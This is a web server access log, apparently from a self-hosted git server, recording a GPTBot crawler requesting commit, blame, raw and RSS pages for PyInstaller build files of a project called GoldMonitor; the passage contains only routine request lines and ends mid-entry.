git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 9810] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" +[17/Feb/2026:18:27:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 100203] [Gzip 29.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" +[17/Feb/2026:18:27:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 100298] [Gzip 29.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" +[17/Feb/2026:18:27:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 9811] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" +[17/Feb/2026:18:27:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 9811] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" +[17/Feb/2026:18:27:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 101146] [Gzip 29.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" +[17/Feb/2026:18:27:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 99976] [Gzip 29.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" +[17/Feb/2026:18:27:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 99916] [Gzip 29.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" +[17/Feb/2026:18:27:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" +[17/Feb/2026:18:27:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" +[17/Feb/2026:18:27:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" +[17/Feb/2026:18:27:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" +[17/Feb/2026:18:27:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 9811] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" +[17/Feb/2026:18:27:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" +[17/Feb/2026:18:27:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" +[17/Feb/2026:18:27:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" +[17/Feb/2026:18:27:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" +[17/Feb/2026:18:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" +[17/Feb/2026:18:27:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" +[17/Feb/2026:18:27:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" +[17/Feb/2026:18:27:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" +[17/Feb/2026:18:27:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" +[17/Feb/2026:18:27:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" +[17/Feb/2026:18:27:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" +[17/Feb/2026:18:27:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" +[17/Feb/2026:18:27:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" +[17/Feb/2026:18:27:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" +[17/Feb/2026:18:27:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" +[17/Feb/2026:18:27:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" +[17/Feb/2026:18:27:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" +[17/Feb/2026:18:27:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" +[17/Feb/2026:18:27:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" +[17/Feb/2026:18:27:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" +[17/Feb/2026:18:27:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" +[17/Feb/2026:18:27:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" +[17/Feb/2026:18:27:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" +[17/Feb/2026:18:27:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 159003] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" +[17/Feb/2026:18:27:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 159003] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" +[17/Feb/2026:18:27:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 73286] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" +[17/Feb/2026:18:27:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 73286] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" +[17/Feb/2026:18:27:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 160535] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" +[17/Feb/2026:18:27:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" +[17/Feb/2026:18:27:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 160654] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" +[17/Feb/2026:18:27:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" +[17/Feb/2026:18:27:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 158884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" +[17/Feb/2026:18:27:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" +[17/Feb/2026:18:27:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 160654] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" +[17/Feb/2026:18:27:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 47964] [Gzip 26.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" +[17/Feb/2026:18:27:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 50052] [Gzip 27.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" +[17/Feb/2026:18:27:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" [Client 74.7.227.38] [Length 50052] [Gzip 27.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" +[17/Feb/2026:18:27:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" +[17/Feb/2026:18:27:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" +[17/Feb/2026:18:27:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" [Client 74.7.227.38] [Length 900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" +[17/Feb/2026:18:27:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" [Client 74.7.227.38] [Length 4184405] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" +[17/Feb/2026:18:27:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" [Client 74.7.227.38] [Length 4276110] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" +[17/Feb/2026:18:27:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 110588] [Gzip 18.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:18:27:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 44317] [Gzip 15.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:18:27:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 71106] [Gzip 17.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:18:27:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" [Client 74.7.227.38] [Length 38] 